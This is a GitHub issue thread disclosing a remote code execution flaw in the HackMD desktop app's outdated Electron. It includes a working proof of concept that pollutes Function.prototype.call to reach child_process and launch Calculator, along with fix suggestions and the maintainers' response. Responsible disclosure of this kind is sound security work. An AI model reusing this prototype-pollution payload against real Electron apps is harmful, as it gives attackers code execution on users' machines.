hackmd desktop remote code execution #20

imagemlt · 2019-10-07T10:44:54Z

hackmd desktop use an old version of electron, in which we can use prototype pollution to get node ability back in webviews without nodeintegration.

poc:

<a href="http://127.0.0.1/gg.html">click me</a>

here is source code of gg.html

<script>
Function.prototype.call2=Function.prototype.call;
Function.prototype.call=function(...args){
    if(args[0]!=null && args[0]!=undefined && args[0].env!=undefined){
        Function.prototype.call=Function.prototype.call2;
        args[0].mainModule.require('child_process').exec('open -a Calculator');
        }
        return this.call2(...args)
}
location.reload();
</script>

when click on it we can get a Calculator on mac.

suggestions:

open external links in system's browser
update electron
add contextisolation.

The text was updated successfully, but these errors were encountered:

imagemlt · 2019-10-08T03:53:58Z

any questions?

jackycute · 2019-10-08T04:11:55Z

Hi @imagemlt,
Thanks for reporting this issue and giving us suggestion.
We will investigate this soon.

jackycute added the bug label Oct 8, 2019

Yukaii mentioned this issue Oct 14, 2019

Feature/upgrade electron #21

Merged

Yukaii closed this as completed in #21 Oct 14, 2019

Yukaii mentioned this issue Oct 14, 2019

v0.1.0 #22

Merged

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

hackmd desktop remote code execution #20

hackmd desktop remote code execution #20

imagemlt commented Oct 7, 2019

imagemlt commented Oct 8, 2019

Uh oh!

jackycute commented Oct 8, 2019

Uh oh!

hackmd desktop remote code execution #20

hackmd desktop remote code execution #20

Comments

imagemlt commented Oct 7, 2019

imagemlt commented Oct 8, 2019

Uh oh!

jackycute commented Oct 8, 2019

Uh oh!